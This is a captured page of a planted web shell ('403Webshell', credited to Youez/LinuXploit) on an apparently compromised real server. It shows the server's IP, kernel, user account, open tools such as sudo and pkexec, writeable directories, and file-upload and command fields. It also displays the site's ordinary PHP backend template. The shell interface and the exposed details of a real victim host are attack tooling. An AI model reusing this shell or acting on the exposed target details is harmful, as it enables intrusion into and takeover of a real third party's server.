403Webshell
Server IP : 103.48.194.25  /  Your IP : 216.73.216.74
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux VMHostDefault 3.10.0-1160.42.2.el7.x86_64 #1 SMP Tue Sep 7 14:49:57 UTC 2021 x86_64
User : sieuthimay ( 1016)
PHP Version : 8.2.20
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/zomuaban.com/public_html/site/views/backend/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/zomuaban.com/public_html/site/views/backend/frame.tpl.php
<!doctype html>
<html lang="en">

<head>
	<meta charset="utf-8"/>
	<meta name="robots" content="noindex"/>
	<meta name="viewport" 	content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
	
		
		
		
	<link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css">
	<?=includeCss('common', 'bootstrap/css/bootstrap.css')?>
	<?=includeCss('common', 'flag-icon/css/flag-icon.css')?>
	<?=includeCss('site', 'bootstrap-theme.css')?>		
	<?=includeCss('site', 'component.css')?>
	<?=includeCss('site', 'icons.css')?>

	<link href="<?php echo base_url(); ?>public/backend/css/style.css" 				rel="stylesheet">
		
	
	<script src="<?=common('js/jquery.js')?>"></script>	
	<script src="<?=common('js/purl.js')?>"></script>
	<script src="<?=common('bootstrap/js/bootstrap.js')?>"></script>
	
	<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js"	type="text/javascript" ></script>

	
		
	<script>
		var $conf = {
						base_url  : function($uri){
										if($uri)return "<?=base_url('backend/'.$this->controllerName).'/'; ?>" + $uri ;
										else return "<?=base_url('backend/'.$this->controllerName).'/'; ?>";
									},
						theme_path  : "<?php echo base_url(); ?>" + "/public/backend/",
						themePath  			: "<?=themeCdn()?>",
						themeCdn  			: "<?=themeCdn()?>",
						commonCdn  			: "<?=common()?>",
						siteName 			: "<?=siteConf('siteName')?>",
						noThumb 			: "<?=noThumb()?>",
						disallowed_key_log 	: 'Disallowed Key Characters.'			
					}
		var $user  = {	id 					: "<?=mine()->id?>",
						role 				: "<?=get_my_role()?>",
						email 				: "<?=mine()->email?>",
						fullname			: "<?=mine()->name?>",
						phone				: "<?=mine()->phone?>",
						lang				: "<?=mine()->lang?>"
					}
	</script>
</head>


<body>
	<div class="container-fluid nopadding">		
		<div id="header" class="navbar navbar-fixed-top" role="navigation">
			<div class="container-fluid nopadding">
				<?=$this->load->view('backend/inc/crud')?>						
			</div>
		</div>			
		<div id="content-wraper" class="col-xs-12">
			<?=$this->load->view($this->actionPath, $content)?>
		</div>		
	</div>
	
	
	
	
	<?php
		includejs('common', 'jquery.cookie.js');
		includejs('common', 'jquery.hotkeys.js');	
		includejs('common', 'jquery.sticky.js');
		includejs('common', 'bootstrap.typeahead.js');	
		
		includejs('site', 'alogap.api.js');
		includejs('site', 'main.js');
		includejs('site', 'util.js');
		
		ksort($this->moduleJs);	
		foreach($this->moduleJs as $files) {
			foreach($files as $file) {
				echo '<script src="'.$file.'"></script>';
			}
		}	
	?>
	
	<?php $this->load->view('backend/pages/'.$this->controllerName.'/inc/_script'); ?>
	
</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit